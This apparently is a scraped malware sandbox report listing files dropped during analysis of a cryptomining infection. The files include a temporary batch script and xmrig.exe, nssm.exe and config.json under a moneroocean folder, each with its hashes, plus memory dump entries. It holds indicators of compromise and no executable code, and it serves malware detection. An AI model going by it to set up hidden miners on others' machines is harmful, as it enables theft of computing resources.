Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
fde778c8c2ff01e0282bb9bcd29e99fa

SHA1
498d2ad61ec44f95f234a725680b2a4b451aa991

SHA256
a844ba00b5b14a63a95fb7888b0cd070bb76eccc8adc5ffd4ec0fc3660cc8ccf

SHA512
e84e7361164268c39715621de5d862a77acab091c2d60dee468a2b1192d3d9e95cefdce0a7b2750fe56b985233343c469d1b53b6302752a450f066956de4a176

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
448044222de2dd8d55a3e21c0a2198ad

SHA1
0b779b16386dbf9058e6c7ff7d3116721e19bb9b

SHA256
ad06726cc43944fc7e497c66916bca94fe8f9727aac3f6a39e8e2b9dc7a7024a

SHA512
a8d8a09562b77ea3c39d9045be6e4826d286300a53072441527a76d962897095cee668fc3310932dbb574a4b20b60495c0839fa24db1ad1d6ba72ea1ad16bdf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
41ff70be904e7ce58dd1ce6ed70d0e8b

SHA1
73e1a711ae3481335db3da4546087510432f6961

SHA256
deb1e3cf039626b4fef8bd2db0574a02147afc7dc6bab2d76177065f1133cebb

SHA512
5141c396cc9c377d6580c6d671df2394b2d91bcca13db77b5d6314c47a53d2de2050676290054b3acdd3f63016a22c40d567516659a3d4c799db0e1c42e0574d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
70595b5937369a2592a524db67e208d3

SHA1
d989b934d9388104189f365694e794835aa6f52f

SHA256
be09b93a020e2e86a0b3c7c3f3d3e2c45f888944b1036df738385ede16f595c8

SHA512
edb412886187a2740eb7e284b16838bdd9f011aba1f4581f1fed25a86cdfe9b2ab4df863edeb3db6b072805439d57b10f3e0a1f2daabe1ee56db275ad2ad61e5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8284e9ee119b88a8e120dd1e8ea30edd

SHA1
44e0c6326005c0cf231c413b0f362bf88ac24230

SHA256
626ccb6257223314557f19e5eb2774e617d46e85a06f250666bced0a258a5d5d

SHA512
836a99bad5bbccfa249041d4a443ba81b6b7e3394d5af659ed2ac3cb7d4062e253fe942c037cf530ee5a1fcff2ec50079a533a59cbf95916b5be0ca4aa0cef2e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
2560193d633f8ba31eb1b92cc174e43b

SHA1
55af0ddc43fe63c28627968623da45fc0c0fea74

SHA256
efd907c391e98e01852551cfe18d33ef32545510406d41690cbebedf26770fe6

SHA512
2200765d29a2bc88011d1c4509cadd0408154649206efb6495ab92ed29117709d698723660198c63a1b4b3433d612690bf6c1454d59c74a3f74a1f07a5c51fd2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7244acd06ce64d0bfb15a0ebf3deaa99

SHA1
b4f875b673fff1e8bb91cb81344f27499e5d6e1c

SHA256
843638324a34f33751bcdf91ee6e17bfab2b7c8d11525329a2f087e886a4863c

SHA512
a00e7024e9a3264f80865fa1c5333375e93d032d0980323a772112c6960846217e486d1103cba134e86f21b377eb951fa38749d864539a7470724452d3cfe55a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
688dccbc073cf5365ace334eb5187ef6

SHA1
67722237c190473f1f99a5c80f26fd7f85db4885

SHA256
e8034174527eed19aab6790665a645e73e7d8b219da1cfa7bbc663e8f05b2b78

SHA512
51965cf4dde121ec278f52baf2632d2ff8aa5b2e8efb25cfb8c7f7cd3e04faf860a3b30e0932d5bfb2201aaa21503a802ec5dd6c8e97053c37e52f32221d4559

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0thaq5xn.ill.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp4391.tmp.bat

Filesize
14KB

MD5
623f6006f683afdb4b7406e3a4ec35bf

SHA1
f63f03d7338317224726eba368f1a045fa2142d7

SHA256
21d6e0b0e8135a929a77f48e00d286bfa4fc2d749a61529e559b8a5ceb63e47b

SHA512
df7ae1e436be99bbf9ec7fe1fb745c9e2dba6b99e24019b5b1f78786198f1aed465575a829e9b8141bc92f0a4c4269e140228b4335f9fa724a60f1330ad6d3ab

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
725d38d9eeadc9c2691063936b01f9ec

SHA1
153fd5bd55cfd845516562291a7ab867d68145b5

SHA256
0df3cdd812a582b5ddf5c8019fe7aecf03edb5760f4cf2d0c81ba73590a2ec43

SHA512
fe2758ddaa974696c733367d479dc54695ee1f177275f3b26d575b3c27b8c968b6bab0ce1e5b715e6513d1f39d880462b3d8cc542507f2eeae531a9a6d337658

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
64cafb884608c751a2bccaca7c582e0f

SHA1
924f71ecb4903ab63a13a125e62fd6e5f5d20cb2

SHA256
3250e852f2fb3e61bd0642d92f1decac666777da7c4d59d6270ee49fc856151b

SHA512
ddd68d3d13bd65f926f6be67ac891c143d6e282ee955871382452f2627ca42ed54e7363d83651b904cdf8054bc1d12a02becd44ac1b5cdc98ac42fc7ebfe97a0

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
85cf29f37f07f28e775a37844227c3a1

SHA1
231c2f9f27c8805913c4c2912d40223fc0b27232

SHA256
e2a7bbe5e94cef8789a36aa5cf35f60ed4ebe5841f8c288fbceb902b6d9d635f

SHA512
10d2a4a76b94e990d4c5c770c5ac6b8ea5c1233437cf82e4a89ffaa0ef43f8f58cb28a656025250e2e2f3daa774b205bde54c30c17a00da50bb322965fd9bd4d

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
08709e43ed8adf72768ec98c78a60ef3

SHA1
39225bf9cc45bee5204ba651365adf1f38e91000

SHA256
2bf498569b6138d495edc627d4833f3f492de26e49bb384d57ac55efa712be40

SHA512
1c8623ab6273ad52ad682606ce1bf38fed2792d6329441fd2f83463f2bc5b80e65daa826820a097e6c2ec7eade75189bbd64bdf35243c0988e5ceee0b713c92a

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
abed5546a02a8c03e0d0946e6c1577f8

SHA1
009f97296fe0cc5f854c364d6ecdb51bc120ce03

SHA256
96068f09d935a5f4857b838e5e1f77e800d7fe68452e62f2cb5ff6fb17e081a7

SHA512
59a83471c7590b3151b861435f258a8ec33ab32437585b4f3315d3602b51b898e35a331accf55de9a9af9c31b25172f0e7b45c5a1eab069f6711bf7a89732b33

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
d4f8a13f8c90e2b3b2e7d30a553df39c

SHA1
5c5303ef682ffcd31e57d1abd900ba5b637d51e4

SHA256
f7fc5b53e709adc1f4116ff47656f7262d7fb2859a100b3e3a5568453485649a

SHA512
68b0b59a732fecc8b345fa0429039d36bc3031ab65198e4d3783a5c16fa768bb6562131c1db58d00ad9c4af7fd8d77aed3c2150930663280a6bbd635ba5831bd

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
c9ef9c214996db3d88f571226910c5d5

SHA1
420ba30247b1e09f706557a7704a1ebee5d3165c

SHA256
fa55a24dccbf28309642d958cbb73f5053e3a56baa0eda22d4581e0151f5f7c1

SHA512
de91ef4268e67c4fa8d7216637bd9ca69ea33b108352675c954d4719d2d58b9414df78c6ebc8f622fcfbeda4ad5f981c2a17a48f7eeae8626cefe5b6894ec68d

Download Submit
C:\Users\Admin\moneroocean\nssm.exe

Filesize
360KB

MD5
1136efb1a46d1f2d508162387f30dc4d

SHA1
f280858dcfefabc1a9a006a57f6b266a5d1fde8e

SHA256
eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848

SHA512
43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5

Download Submit
C:\Users\Admin\moneroocean\xmrig.exe

Filesize
9.0MB

MD5
9ee2c39700819e5daab85785cac24ae1

SHA1
9b5156697983b2bdbc4fff0607fadbfda30c9b3b

SHA256
e7c13a06672837a2ae40c21b4a1c8080d019d958c4a3d44507283189f91842e3

SHA512
47d81ff829970c903f15a791b2c31cb0c6f9ed45fdb1f329c786ee21b0d1d6cd2099edb9f930824caceffcc936e222503a0e2c7c6253718a65a5239c6c88b649

Download Submit
C:\Users\Admin\nssm.zip

Filesize
135KB

MD5
7ad31e7d91cc3e805dbc8f0615f713c1

SHA1
9f3801749a0a68ca733f5250a994dea23271d5c3

SHA256
5b12c3838e47f7bc6e5388408a1701eb12c4bbfcd9c19efd418781304590d201

SHA512
d7d947bfa40d6426d8bc4fb30db7b0b4209284af06d6db942e808cc959997cf23523ffef6c44b640f3d8dbe8386ebdc041d0ecb5b74e65af2c2d423df5396260

Download Submit
C:\Users\Admin\xmrig.zip

Filesize
3.5MB

MD5
640be21102a295874403dc35b85d09eb

SHA1
e8f02b3b8c0afcdd435a7595ad21889e8a1ab0e4

SHA256
ed33e294d53a50a1778ddb7dca83032e9462127fce6344de2e5d6be1cd01e64b

SHA512
ece0dfe12624d5892b94d0da437848d71b16f7c57c427f0b6c6baf757b9744f9e3959f1f80889ffefcb67a755d8bd7a7a63328a29ac9c657ba04bbdca3fea83e

Download Submit
memory/924-200-0x00007FFF04090000-0x00007FFF04B51000-memory.dmp

Filesize
10.8MB

Download
memory/924-0-0x00007FFF04093000-0x00007FFF04095000-memory.dmp

Filesize
8KB

Download
memory/924-6-0x000001BF7EA10000-0x000001BF7EA32000-memory.dmp

Filesize
136KB

Download
memory/924-12-0x00007FFF04090000-0x00007FFF04B51000-memory.dmp

Filesize
10.8MB

Download
memory/924-11-0x00007FFF04090000-0x00007FFF04B51000-memory.dmp

Filesize
10.8MB

Download
memory/1212-65-0x00000000000E0000-0x0000000000100000-memory.dmp

Filesize
128KB

Download
memory/1212-66-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3936-201-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3936-206-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3936-214-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3936-202-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3936-203-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3936-204-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3936-205-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3936-213-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3936-207-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3936-208-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3936-209-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3936-210-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3936-211-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3936-212-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4732-40-0x0000026E2F8B0000-0x0000026E2F8C2000-memory.dmp

Filesize
72KB

Download
memory/4732-39-0x0000026E16BB0000-0x0000026E16BBA000-memory.dmp

Filesize
40KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.